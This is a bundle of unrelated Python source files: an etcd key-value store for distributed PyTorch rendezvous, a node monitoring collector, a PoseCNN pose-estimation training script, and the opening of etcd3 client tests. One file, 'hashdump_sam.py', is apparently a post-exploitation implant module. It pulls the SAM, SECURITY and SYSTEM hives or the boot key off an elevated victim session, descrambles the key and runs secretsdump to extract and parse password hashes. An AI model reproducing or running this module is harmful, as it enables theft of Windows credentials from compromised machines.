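#   store = rdzv.setup_kv_store(rdzv_version)      # c10d-compatible EtcdStore
#   rdzv.store_extra_data(rdzv_version, "master_addr", "10.0.0.1")
#   addr = rdzv.load_extra_data(rdzv_version, "master_addr")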
# pyre-fixme[11]: Annotation `Store` is not defined as a type.
class EtcdStore(Store):
"""
Implements a c10 Store interface by piggybacking on the rendezvous etcd
instance. This is the store object returned by ``EtcdRendezvous``
"""
def __init__(
self,
etcd_client,
etcd_store_prefix,
timeout: Optional[datetime.timedelta] = None,
):
super().__init__() # required for pybind trampoline.
self.client = etcd_client
self.prefix = etcd_store_prefix
# Default timeout same as in c10d/Store.hpp
self.timeout = (
timeout if timeout is not None else datetime.timedelta(seconds=300)
)
if not self.prefix.endswith("/"):
self.prefix += "/"
def set(self, key, value):
"""
Write a key/value pair into ``EtcdStore``.
Both key and value may be either Python ``str`` or ``bytes``.
"""
self.client.set(key=self.prefix + self._encode(key), value=self._encode(value))
def get(self, key) -> bytes:
"""
Get a value by key, possibly doing a blocking wait.
If key is not immediately present, will do a blocking wait
for at most ``timeout`` duration or until the key is published.
Returns:
value ``(bytes)``
Raises:
LookupError - If key still not published after timeout
"""
b64_key = self.prefix + self._encode(key)
kvs = self._try_wait_get([b64_key])
if kvs is None:
raise LookupError(f"Key {key} not found in EtcdStore")
return self._decode(kvs[b64_key])
def add(self, key, num: int) -> int:
"""
Atomically increment a value by an integer amount. The integer is
represented as a string using base 10. If key is not present,
a default value of ``0`` will be assumed.
Returns:
the new (incremented) value
"""
b64_key = self._encode(key)
# c10d Store assumes value is an integer represented as a decimal string
try:
# Assume default value "0", if this key didn't yet:
node = self.client.write(
key=self.prefix + b64_key,
value=self._encode(str(num)), # i.e. 0 + num
prevExist=False,
)
return int(self._decode(node.value))
except etcd.EtcdAlreadyExist:
pass
while True:
# Note: c10d Store does not have a method to delete keys, so we
# can be sure it's still there.
node = self.client.get(key=self.prefix + b64_key)
new_value = self._encode(str(int(self._decode(node.value)) + num))
try:
node = self.client.test_and_set(
key=node.key, value=new_value, prev_value=node.value
)
return int(self._decode(node.value))
except etcd.EtcdCompareFailed:
cas_delay()
def wait(self, keys, override_timeout: Optional[datetime.timedelta] = None):
"""
Waits until all of the keys are published, or until timeout.
Raises:
LookupError - if timeout occurs
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(b64_keys, override_timeout)
if kvs is None:
raise LookupError("Timeout while waiting for keys in EtcdStore")
# No return value on success
def check(self, keys) -> bool:
"""
Check if all of the keys are immediately present (without waiting).
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(
b64_keys,
override_timeout=datetime.timedelta(microseconds=1), # as if no wait
)
return kvs is not None
def set_timeout(self, timeout: datetime.timedelta):
"""
Change the timeout used for all future operations.
"""
self.timeout = timeout
#
# Encode key/value data in base64, so we can store arbitrary binary data
# in EtcdStore. Input can be `str` or `bytes`.
# In case of `str`, utf-8 encoding is assumed.
#
def _encode(self, value) -> str:
if type(value) == bytes:
return b64encode(value).decode()
elif type(value) == str:
return b64encode(value.encode()).decode()
raise ValueError("Value must be of type str or bytes")
#
# Decode a base64 string (of type `str` or `bytes`).
# Return type is `bytes`, which is more convenient with the Store interface.
#
def _decode(self, value) -> bytes:
if type(value) == bytes:
return b64decode(value)
elif type(value) == str:
return b64decode(value.encode())
raise ValueError("Value must be of type str or bytes")
#
# Get all of the (base64-encoded) etcd keys at once, or wait until all the keys
# are published or timeout occurs.
# This is a helper method for the public interface methods.
#
# On success, a dictionary of {etcd key -> etcd value} is returned.
# On timeout, None is returned.
#
def _try_wait_get(self, b64_keys, override_timeout=None):
timeout = self.timeout if override_timeout is None else override_timeout
deadline = time.time() + timeout.total_seconds()
while True:
# Read whole directory (of keys), filter only the ones waited for
all_nodes = self.client.get(key=self.prefix)
req_nodes = {
node.key: node.value
for node in all_nodes.children
if node.key in b64_keys
}
if len(req_nodes) == len(b64_keys):
# All keys are available
return req_nodes
watch_timeout = deadline - time.time()
if watch_timeout <= 0:
return None
try:
self.client.watch(
key=self.prefix,
recursive=True,
timeout=watch_timeout,
index=all_nodes.etcd_index + 1,
)
except etcd.EtcdWatchTimedOut:
if time.time() >= deadline:
return None
else:
continue
except etcd.EtcdEventIndexCleared:
continue
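# Illustrative EtcdStore usage (a sketch; in practice the store is obtained via
# EtcdRendezvous.setup_kv_store() rather than constructed directly, and the
# prefix below is hypothetical):
#
#   store = EtcdStore(etcd_client=client, etcd_store_prefix="/example/kv")
#   store.set("epoch", "3")
#   assert store.get("epoch") == b"3"     # values come back as bytes
#   store.add("counter", 1)               # atomic increment; missing key counts as 0
#   store.wait(["epoch", "counter"])      # blocks until all keys exist or timeout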
# Helper for _etcd_rendezvous_handler(url)
def _parse_etcd_client_params(params):
kwargs = {}
if "protocol" in params:
protocol = params["protocol"]
assert protocol in ["http", "https"], "Protocol must be http or https."
kwargs["protocol"] = protocol
if "cacert" in params:
kwargs["ca_cert"] = params["cacert"]
if "cert" in params:
if "key" in params:
# python-etcd client expects key as a second element of `cert` tuple
kwargs["cert"] = (params["cert"], params["key"])
else:
kwargs["cert"] = params["cert"]
return kwargs
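# For example (illustrative paths), query parameters
#   {"protocol": "https", "cacert": "/path/ca.crt",
#    "cert": "/path/client.crt", "key": "/path/client.key"}
# become python-etcd client kwargs
#   {"protocol": "https", "ca_cert": "/path/ca.crt",
#    "cert": ("/path/client.crt", "/path/client.key")}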
# Handler for torch.distributed "static" registration
def create_rdzv_handler(rdzv_params: RendezvousParameters):
"""
Usage:
::
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint="192.168.0.42:2379",
run_id="123",
min_nodes=4,
max_nodes=8,
timeout=300,
last_call_timeout=30,
etcd_prefix="custom_prefix",
protocol="https",
cacert="/etc/kubernetes/certs/ca.crt",
cert="/etc/kubernetes/certs/client.crt",
key="/etc/kubernetes/certs/client.key")
# -- or --
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint="192.168.0.42:2379",
run_id="123",
min_nodes=4,
max_nodes=8)
etcd_rdzv_handler = create_rdzv_handler(rdzv_params)
Where:
run_id - unique id for this training job instance,
min_nodes - min number of workers expected to join the rendezvous,
max_nodes - max number of workers allowed to join the rendezvous,
defaults to min_nodes if not specified.
timeout - total timeout within which next_rendezvous is expected to
succeed; a RendezvousTimeoutException is raised otherwise;
Default is 600 (10 minutes).
last_call_timeout - additional wait amount ("last call") after
min number of workers has been reached.
Defaults to 30 seconds.
etcd_prefix - path prefix (from etcd root), inside which all
etcd nodes will be created.
Default is "/torchelastic/p2p".
protocol - http (default) or https to access etcd.
cacert - CA cert to access etcd, only makes sense with https.
cert - client cert to access etcd, only makes sense with https.
key - client key to access etcd, only makes sense with https.
"""
import re
# Etcd endpoints. (Current url format only allows a single host)
endpoint = rdzv_params.endpoint
match = re.match(r"(.+):(\d+)$", endpoint) # check if port was provided
if match:
etcd_endpoints = ((match.group(1), int(match.group(2))),)
else:
# Use default etcd port
etcd_endpoints = ((endpoint, 2379),)
# Run ID value -> unique identifier of this training job instance:
# typically a job_id or name assigned by the scheduler or user
run_id = rdzv_params.run_id
# Parse all of query parameters:
etcd_prefix = rdzv_params.get("etcd_prefix", "/torchelastic/p2p")
min_workers = rdzv_params.min_nodes
max_workers = rdzv_params.max_nodes
assert min_workers >= 1, "Min number of workers should be at least 1"
assert (
max_workers >= min_workers
), "Max number of workers cannot be less than min number of workers"
timeout = rdzv_params.get("timeout", CONST_DEFAULT_OVERALL_TIMEOUT)
last_call_timeout = rdzv_params.get(
"last_call_timeout", CONST_DEFAULT_LAST_CALL_TIMEOUT
)
kwargs = _parse_etcd_client_params(rdzv_params.configs)
# Etcd rendezvous implementation
etcd_rdzv = EtcdRendezvous(
endpoints=etcd_endpoints,
prefix=etcd_prefix,
run_id=run_id,
num_min_workers=min_workers,
num_max_workers=max_workers,
timeout=timeout,
last_call_timeout=last_call_timeout,
**kwargs,
)
return EtcdRendezvousHandler(rdzv_impl=etcd_rdzv)
|
hashdump_sam.py
|
import core.implant
import core.job, core.cred_parser
class HashDumpSAMImplant(core.implant.Implant):
NAME = "SAM Hash Dump"
DESCRIPTION = "Dumps the SAM hive off the target system."
AUTHORS = ["zerosum0x0"]
def load(self):
self.options.register("LPATH", "/tmp/", "local file save path")
self.options.register("RPATH", "%TEMP%", "remote file save path")
self.options.register("GETSYSHIVE", "false", "Retrieve the system hive? (slower, but more reliable)",enum=["true", "false"])
def job(self):
return HashDumpSAMJob
def run(self):
import os.path
if not os.path.isfile("data/impacket/examples/secretsdump.py"):
old_prompt = self.shell.prompt
old_clean_prompt = self.shell.clean_prompt
self.shell.prompt = "Would you like me to get it for you? y/N: "
self.shell.clean_prompt = self.shell.prompt
self.shell.print_warning("It doesn't look like you have the impacket submodule installed yet! This module will fail if you don't have it!")
try:
import readline
readline.set_completer(None)
option = self.shell.get_command(self.shell.prompt)
if option.lower() == "y":
from subprocess import call
call(["git", "submodule", "init"])
call(["git", "submodule", "update"])
except KeyboardInterrupt:
self.shell.print_plain(self.shell.clean_prompt)
return
finally:
self.shell.prompt = old_prompt
self.shell.clean_prompt = old_clean_prompt
self.options.set("RPATH", self.options.get('RPATH').replace("\\", "\\\\").replace('"', '\\"'))
payloads = {}
payloads["js"] = self.loader.load_script("data/implant/gather/hashdump_sam.js", self.options)
self.dispatch(payloads, self.job)
class HashDumpSAMJob(core.job.Job):
def create(self):
if self.session_id == -1:
return
if self.session.elevated != 1 and self.options.get("IGNOREADMIN") == "false":
self.error("0", "This job requires an elevated session. Set IGNOREADMIN to true to run anyway.", "Not elevated", "")
return False
def save_file(self, data, name, encoder):
import uuid
save_fname = self.options.get("LPATH") + "/" + name + "." + self.ip + "." + uuid.uuid4().hex
save_fname = save_fname.replace("//", "/")
with open(save_fname, "wb") as f:
data = self.decode_downloaded_data(data, encoder)
f.write(data)
return save_fname
def report(self, handler, data, sanitize = False):
task = handler.get_header("Task", False)
if task == "SAM":
handler.reply(200)
self.print_status("received SAM hive (%d bytes)" % len(data))
self.sam_data = data
self.sam_encoder = handler.get_header("encoder", 1252)
return
if task == "SYSTEM":
handler.reply(200)
self.print_status("received SYSTEM hive (%d bytes)" % len(data))
self.system_data = data
self.system_encoder = handler.get_header("encoder", 1252)
return
if task == "SysKey":
handler.reply(200)
self.print_status("received SysKey (%d bytes)" % len(data))
self.syskey_data = data
self.system_data = ""
self.syskey_encoder = handler.get_header("encoder", 1252)
return
if task == "SECURITY":
handler.reply(200)
self.print_status("received SECURITY hive (%d bytes)" % len(data))
self.security_data = data
self.security_encoder = handler.get_header("encoder", 1252)
return
# dump sam here
import threading
self.finished = False
threading.Thread(target=self.finish_up).start()
handler.reply(200)
def finish_up(self):
from subprocess import Popen, PIPE, STDOUT
path = "data/impacket/examples/secretsdump.py"
self.sam_file = self.save_file(self.sam_data, "SAM", self.sam_encoder)
self.print_status("decoded SAM hive (%s)" % self.sam_file)
self.security_file = self.save_file(self.security_data, "SECURITY", self.security_encoder)
self.print_status("decoded SECURITY hive (%s)" % self.security_file)
if self.system_data:
self.system_file = self.save_file(self.system_data, "SYSTEM", self.system_encoder)
self.print_status("decoded SYSTEM hive (%s)" % self.system_file)
cmd = ['python2', path, '-sam', self.sam_file, '-system', self.system_file, '-security', self.security_file, 'LOCAL']
else:
self.syskey_data_file = self.save_file(self.syskey_data, "SYSKEY", self.syskey_encoder)
tmp_syskey = ""
self.syskey = ""
with open(self.syskey_data_file, 'rb') as syskeyfile:
file_contents = syskeyfile.read()
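# The loop below walks fixed offsets in the downloaded SysKey blob to pull out
# the scrambled boot key characters; the exact offsets/stride appear to match
# the format produced by the accompanying hashdump_sam.js implant (an
# assumption based on this code, not verified here). The `transforms` table
# further down is the well-known bootkey descrambling permutation also used by
# secretsdump.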
i = 4220
while i < 28811:
j = i + 15
while i < j:
tmp_syskey += file_contents[i:i+1].decode()
i += 2
i += 8176
tmp_syskey = list(map(''.join, zip(*[iter(tmp_syskey)]*2)))
transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
for i in transforms:
self.syskey += tmp_syskey[i]
try:
self.syskey.decode()
except:
self.error("0", "There was a problem decoding the syskey. Try setting GETSYSHIVE to true and running again.", "Decode error", "")
return False
self.print_status("decoded SysKey: 0x%s" % self.syskey)
cmd = ['python2', path, '-sam', self.sam_file, '-bootkey', self.syskey, '-security', self.security_file, 'LOCAL']
p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True, env={"PYTHONPATH": "./data/impacket"})
output = p.stdout.read().decode()
self.shell.print_plain(output)
self.results = output
cp = core.cred_parser.CredParse(self)
cp.parse_hashdump_sam(output)
super(HashDumpSAMJob, self).report(None, "", False)
def done(self):
pass
def display(self):
pass
|
main.py
|
## ALL RIGHTS RESERVED.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
## Neither the name of the SONATA-NFV, 5GTANGO [, ANY ADDITIONAL AFFILIATION]
## nor the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## This work has been performed in the framework of the SONATA project,
## funded by the European Commission under Grant number 671517 through
## the Horizon 2020 and 5G-PPP programmes. The authors would like to
## acknowledge the contributions of their colleagues of the SONATA
## partner consortium (www.sonata-nfv.eu).
##
## This work has been performed in the framework of the 5GTANGO project,
## funded by the European Commission under Grant number 761493 through
## the Horizon 2020 and 5G-PPP programmes. The authors would like to
## acknowledge the contributions of their colleagues of the 5GTANGO
## partner consortium (www.5gtango.eu).
# encoding: utf-8
import urllib2, time, logging
import json, os, subprocess
from threading import Thread
from VmData import vmdt
from DtFiltering import valdt
from ContData import cntdt
from configure import configuration
from logging.handlers import RotatingFileHandler
def init():
global prometh_server
global node_name
global logger
global vm_id
#read configuration
conf = configuration("/opt/Monitoring/node.conf")
if hasattr(conf.ConfigSectionMap("vm_node"),'cadvisor'):
cadvisor = conf.ConfigSectionMap("vm_node")['cadvisor']
node_name = os.getenv('NODE_NAME', conf.ConfigSectionMap("vm_node")['node_name'])
prometh_server = os.getenv('PROM_SRV', conf.ConfigSectionMap("Prometheus")['server_url'])
#node_name = conf.ConfigSectionMap("vm_node")['node_name']
#prometh_server = conf.ConfigSectionMap("Prometheus")['server_url']
if hasattr(conf.ConfigSectionMap("vm_node"),'node_exporter'):
node_exporter = conf.ConfigSectionMap("vm_node")['node_exporter']
logger = logging.getLogger('dataCollector')
#hdlr = logging.FileHandler('dataCollector.log', mode='w')
hdlr = RotatingFileHandler('dataCollector.log', maxBytes=10000, backupCount=1)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.WARNING)
logger.setLevel(logging.INFO)
#vm_id = getMetaData()
vm_id = getUUID()
if vm_id == None:
vm_id = node_name
node_name +=":"+vm_id
print vm_id
logger.info('SP Data Collector')
logger.info('Promth Server '+prometh_server)
logger.info('Monitoring Node '+node_name)
def postNode(node_,type_, data_):
url = prometh_server+"/job/"+type_+"/instance/"+node_
logger.info('Post on: \n'+url)
try:
req = urllib2.Request(url)
req.add_header('Content-Type','text/html')
req.get_method = lambda: 'PUT'
response=urllib2.urlopen(req,data_)
code = response.code
logger.info('Response Code: '+str(code))
except urllib2.HTTPError, e:
logger.warning('Error: '+str(e))
except urllib2.URLError, e:
logger.warning('Error: '+str(e))
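# Illustrative target URL built by postNode() above (host value is hypothetical):
#   <server_url>/job/<type_>/instance/<node_name>
#   e.g. http://monitoring-server/job/vm/instance/node1:<uuid>
# where type_ is "vm" or "containers", as used in the main loop below.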
def getUUID():
path = '/usr/sbin/dmidecode | grep UUID'
print(os.path.isdir("/rootfs"))
if (os.path.isdir("/rootfs")):
path = '/rootfs'+path
p = subprocess.Popen(path, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
lines = p.stdout.readlines()
try:
for line in lines:
ar = line.split(" ")
return ar[1].strip().lower()
except:
logger.warning('Error on retrieving UUID')
return None
pass
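# getUUID() above assumes dmidecode prints a line roughly like (illustrative):
#   UUID: 4C4C4544-0032-3510-8057-B7C04F564433
# so splitting on a space and taking ar[1] yields the UUID, which is then
# stripped and lower-cased.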
def getMetaData():
try:
url = 'http://169.254.169.254/openstack/latest/meta_data.json'
req = urllib2.Request(url)
req.add_header('Content-Type','application/json')
response=urllib2.urlopen(req, timeout = 180)
code = response.code
data = json.loads(response.read())
#print json.dumps(data)
return data["uuid"]
except urllib2.HTTPError, e:
logger.warning('Error: '+str(e))
except urllib2.URLError, e:
logger.warning('Error: '+str(e))
except ValueError, e:
logger.warning('Error: '+str(e))
def function1(id_):
global vm_dt
vm_dt = None
lsval={}
while 1:
dt_collector = vmdt(id_,lsval)
lsval = dt_collector.getCurrentDT()
vm_dt = dt_collector.prom_parser()
time.sleep(1)
def function2():
global container_dt
container_dt = None
while 1:
container_dt = cntdt().prom_parser()
time.sleep(4)
if __name__ == "__main__":
init()
t1 = Thread(target = function1, args=(vm_id,))
t2 = Thread(target = function2)
t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
while 1:
time.sleep(5)
if container_dt:
postNode(node_name,"containers",container_dt)
if vm_dt:
postNode(node_name,"vm",vm_dt)
|
train_net_pth.py
|
import time, os, sys
import os.path as osp
import numpy as np
from Queue import Queue
from threading import Thread
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
sys.path.append("lib/model")
from average_distance_loss.modules.average_distance_loss import AverageDistanceLoss
from hard_label.modules.hard_label import HardLabel
import _init_paths
from fcn.config import cfg, cfg_from_file, get_output_dir
from datasets.factory import get_imdb
from gt_posecnn_layer.layer import GtPoseCNNLayer
# from fcn.train import SolverWrapper
import cv2
# OpenCL may be enabled by default in OpenCV3; disable it because it's not
# thread safe and causes unwanted GPU memory allocations.
cv2.ocl.setUseOpenCL(False)
def load_cfg(args):
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
cfg.GPU_ID = args.gpu_id
device_name = '/gpu:{:d}'.format(args.gpu_id)
print(device_name)
cfg.RIG = args.rig_name
cfg.CAD = args.cad_name
cfg.POSE = args.pose_name
cfg.IS_TRAIN = True
cfg.TRAIN.LEARNING_RATE = 0.0005
cfg.TRAIN.SNAPSHOT_ITERS = 500
cfg.TRAIN.USE_FLIPPED = False
cfg.TRAIN.IMS_PER_BATCH = 1
# cfg.TRAIN.SNAPSHOT_PREFIX = "vgg16"
cfg.TRAIN.SNAPSHOT_PREFIX = "resnet50"
def get_lov2d_args():
class Args():
pass
args = Args()
args.gpu_id = 0
args.max_iters = 200
# args.pretrained_model = "/data/models/vgg16.pth"
args.pretrained_model = "/data/models/resnet50.pth"
args.pretrained_ckpt = None#"posecnn.pth"
# args.pretrained_ckpt = "output/lov/lov_debug/resnet50_lov_iter_100.pth"
args.cfg_file = "experiments/cfgs/lov_color_2d.yml"
args.imdb_name = "lov_debug"
args.randomize = False
args.rig_name = None # "data/LOV/camera.json"
args.cad_name = "data/LOV/models.txt"
args.pose_name = "data/LOV/poses.txt"
return args
def get_network():
from convert_to_pth import PoseCNN
return PoseCNN(cfg.TRAIN.NUM_UNITS, cfg.TRAIN.NUM_CLASSES, \
500, cfg.TRAIN.VOTING_THRESHOLD, cfg.IS_TRAIN, 0.5)
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
# if cfg.TRAIN.USE_FLIPPED:
# print 'Appending horizontally-flipped training examples...'
# imdb.append_flipped_images()
# print 'done'
return imdb.roidb
def save_net(network, output_dir, iter):
infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix + '_iter_{:d}'.format(iter+1) + '.pth')
filename = os.path.join(output_dir, filename)
torch.save(network.state_dict(), filename)
print("Saved to %s"%(filename))
def loss_cross_entropy_single_frame(scores, labels):
"""
scores: a tensor [batch_size, num_classes, height, width]
labels: a tensor [batch_size, num_classes, height, width]
"""
cross_entropy = -torch.sum(labels * scores, 1)
loss = torch.div( torch.sum(cross_entropy), torch.sum(labels) + 1e-10)
return loss
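# Restated as a formula (equivalent to the code above): the caller passes
# log-probabilities (see F.log_softmax in get_losses), so with one-hot-style
# `labels`:
#   loss = -sum(labels * log_prob) / (sum(labels) + 1e-10)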
def smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights, sigma=1.0):
sigma_2 = sigma ** 2
vertex_diff = vertex_pred - vertex_targets
diff = torch.mul(vertex_weights, vertex_diff)
abs_diff = torch.abs(diff)
smoothL1_sign = (abs_diff < 1. / sigma_2).clone().float()
smoothL1_sign.detach_()
# smoothL1_sign = smoothL1_sign.float()
# smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_diff, 1. / sigma_2)))
in_loss = torch.pow(diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
+ (abs_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
loss = torch.div( torch.sum(in_loss), torch.sum(vertex_weights) + 1e-10 )
return loss
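# Equivalent piecewise form of the weighted smooth-L1 above, with
# d = vertex_weights * (vertex_pred - vertex_targets):
#   elementwise loss = 0.5 * sigma^2 * d^2     if |d| < 1 / sigma^2
#                    = |d| - 0.5 / sigma^2     otherwise
# summed and normalized by sum(vertex_weights) + 1e-10.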
def hard_label_func(prob_normalized, gt_label_2d, threshold=1.0):
return HardLabel(threshold)(gt_label_2d, prob_normalized)
def average_distance_loss_func(poses_pred, poses_target, poses_weight, points, symmetry, num_classes, margin=0.01):
return AverageDistanceLoss(num_classes, margin)(poses_pred, poses_target, poses_weight, points, symmetry)
def transpose_BHWC_to_BCHW(x):
return np.transpose(x, [0,3,1,2])
def CT(x, dtype=torch.float32, requires_grad=False):
return torch.tensor(x, dtype=dtype, requires_grad=requires_grad, device="cuda")
def FCT(x, requires_grad=False):
return CT(x, requires_grad=requires_grad)
def ICT(x, requires_grad=False):
return CT(x, dtype=torch.int32, requires_grad=requires_grad)
def fetch_data(q, data_layer, sleep_time=None):
while True:
blobs = data_layer.forward()
blobs['data_image_color'] = FCT(transpose_BHWC_to_BCHW(blobs['data_image_color']))
blobs['data_vertex_weights'] = FCT(transpose_BHWC_to_BCHW(blobs['data_vertex_weights']))
blobs['data_vertex_targets'] = FCT(transpose_BHWC_to_BCHW(blobs['data_vertex_targets']))
blobs['data_points'] = FCT(blobs['data_points'])
blobs['data_label'] = ICT(blobs['data_label'])
blobs['data_extents'] = FCT(blobs['data_extents'])
blobs['data_pose'] = FCT(blobs['data_pose'])
blobs['data_meta_data'] = FCT(blobs['data_meta_data'])
blobs['data_symmetry'] = FCT(blobs['data_symmetry'])
q.put(blobs)
if sleep_time is not None and sleep_time != 0:
time.sleep(sleep_time)
def get_losses(network, blobs, num_classes, include_pose_loss=False):
blob_im = blobs['data_image_color']
vertex_weights = blobs['data_vertex_weights']
vertex_targets = blobs['data_vertex_targets']
blob_points = blobs['data_points']
blob_labels = blobs['data_label']
blob_extents = blobs['data_extents']
blob_poses = blobs['data_pose']
blob_meta_data = blobs['data_meta_data']
blob_sym = blobs['data_symmetry']
# pose loss
if include_pose_loss:
scores, label_2d, vertex_pred, hough_outputs, poses_tanh = network.forward(blob_im, blob_extents, blob_poses, blob_meta_data)
poses_target, poses_weight = hough_outputs[2:4]
poses_mul = torch.mul(poses_tanh, poses_weight)
poses_pred = F.normalize(poses_mul, p=2, dim=1)
loss_pose = cfg.TRAIN.POSE_W * average_distance_loss_func(poses_pred, poses_target, poses_weight, blob_points, blob_sym, num_classes, margin=0.01)
else:
scores, label_2d, vertex_pred = network.forward_image(blob_im)
loss_pose = FCT(0)
# cls loss
prob = F.log_softmax(scores, 1).permute((0,2,3,1)).clone() # permute for hard_label_func, which is in BHWC format
prob_n = F.softmax(scores, 1).permute((0,2,3,1)).clone() # permute for hard_label_func, which is in BHWC format
hard_labels = hard_label_func(prob_n, blob_labels, threshold=1.0)
loss_cls = loss_cross_entropy_single_frame(prob, hard_labels)
# vertex loss
loss_vertex = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights)
loss = loss_cls + loss_vertex + loss_pose
# loss_regu = 0 # TODO: tf.add_n(tf.losses.get_regularization_losses(), 'regu')
return loss, loss_cls, loss_vertex, loss_pose
def train_net(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
num_classes = imdb.num_classes
# LOAD DATA LAYER
data_layer = GtPoseCNNLayer(roidb, num_classes, imdb._extents, imdb._points_all, imdb._symmetry)
q = Queue(maxsize=10)
sleep_time_seconds = None
num_data_workers = 3
for i in xrange(num_data_workers):
worker = Thread(target=fetch_data, args=(q,data_layer,sleep_time_seconds,))
worker.setDaemon(True)
worker.start()
# LOAD PRETRAINED MODEL OR CKPT
if pretrained_ckpt is not None:
print ('Loading pretrained ckpt weights from %s'%(pretrained_ckpt))
ckpt = torch.load(pretrained_ckpt)
network.load_state_dict(ckpt)
elif pretrained_model is not None:
print ('Loading pretrained model weights from %s'%(pretrained_model))
network.load_pretrained(pretrained_model)
torch.cuda.empty_cache()
network.cuda()
network.train()
# optimizer
start_lr = cfg.TRAIN.LEARNING_RATE
momentum = cfg.TRAIN.MOMENTUM
optimizer = optim.Adam(network.parameters(), lr=start_lr, weight_decay=cfg.TRAIN.WEIGHT_REG)
# optimizer = optim.SGD(filter(lambda p: p.requires_grad,network.parameters()), lr=start_lr, momentum=momentum, weight_decay=cfg.TRAIN.WEIGHT_REG)
# optimizer = optim.SGD(filter(lambda p: p.requires_grad,network.parameters()), lr=start_lr, momentum=momentum)
lr = start_lr
# global_step = tf.Variable(0, trainable=False)
# learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
# cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
get_tensor_np = lambda x: x.data.cpu().numpy()
print('Training...')
last_snapshot_iter = 0
iter = 0
loss_cls = loss_vertex = 1e5
while iter < max_iters:
if q.empty():
sleep_s = 0.5
print("Data queue empty, sleeping for %.2f seconds.."%(sleep_s))
time.sleep(sleep_s)
continue
blobs = q.get()
q.task_done()
include_pose_loss = loss_cls < 0.4 and loss_vertex < 0.2
loss, loss_cls, loss_vertex, loss_pose = get_losses(network, blobs, num_classes, include_pose_loss=include_pose_loss)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# loss_value, loss_cls_value, loss_vertex_value, loss_pose_value = get_tensor_np(loss),
# get_tensor_np(loss_cls), get_tensor_np(loss_vertex), get_tensor_np(loss_pose)
print('iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.6f' %\
(iter+1, max_iters, loss, loss_cls, loss_vertex, loss_pose, lr))
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
save_net(network, output_dir, iter)
iter += 1
iter -= 1
if last_snapshot_iter != iter:
save_net(network, output_dir, iter)
print('Training complete')
if __name__ == '__main__':
# from fcn.train import train_net#, get_training_roidb
args = get_lov2d_args()
load_cfg(args)
if not args.randomize:
# fix the random seed (numpy) for reproducibility
np.random.seed(cfg.RNG_SEED)
imdb = get_imdb(args.imdb_name)
output_dir = get_output_dir(imdb, None)
print('Output will be saved to `{:s}`'.format(output_dir))
roidb = get_training_roidb(imdb)
network = get_network()
train_net(network, imdb, roidb, output_dir,
pretrained_model=args.pretrained_model,
pretrained_ckpt=args.pretrained_ckpt,
max_iters=args.max_iters)
|
test_etcd3.py
|
"""
Tests for `etcd3` module.
----------------------------------
"""
import base64
import contextlib
import json
import os
import signal
import string
import subprocess
import tempfile
import threading
import time
import grpc
from hypothesis import given, settings
from hypothesis.strategies import characters
import mock
import pytest
import six
from six.moves.urllib.parse import urlparse
from tenacity import retry, stop_after_attempt, wait_fixed
import etcd3
import etcd3.etcdrpc as etcdrpc
import etcd3.exceptions
import etcd3.utils as utils
from etcd3.client import EtcdTokenCallCredentials
etcd_version = os.environ.get('TEST_ETCD_VERSION', 'v3.2.8')
os.environ['ETCDCTL_API'] = '3'
if six.PY2:
int_types = (int, long)
else:
int_types = (int,)
# Don't set any deadline in Hypothesis
settings.register_profile("default", deadline=None)
settings.load_profile("default")
def etcdctl(*args):
endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
if endpoint:
args = ['--endpoints', endpoint] + list(args)
args = ['etcdctl', '-w', 'json'] + list(args)
print(" ".join(args))
output = subprocess.check_output(args)
return json.loads(output.decode('utf-8'))
# def etcdctl2(*args):
# # endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
# # if endpoint:
# # args = ['--endpoints', endpoint] + list(args)
# # args = ['echo', 'pwd', '|', 'etcdctl', '-w', 'json'] + list(args)
# # print(" ".join(args))
# output = subprocess.check_output("echo pwd | ./etcdctl user add root")
# return json.loads(output.decode('utf-8'))
@contextlib.contextmanager
def _out_quorum():
pids = subprocess.check_output(['pgrep', '-f', '--', '--name pifpaf[12]'])
pids = [int(pid.strip()) for pid in pids.splitlines()]
try:
for pid in pids:
os.kill(pid, signal.SIGSTOP)
yield
finally:
for pid in pids:
os.kill(pid, signal.SIGCONT)
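# _out_quorum() SIGSTOPs the pifpaf-managed etcd members so the cluster
# temporarily loses quorum; a sketch of how it is used in the tests below:
#
#   with _out_quorum():
#       # only serializable (local, possibly stale) reads are expected to work
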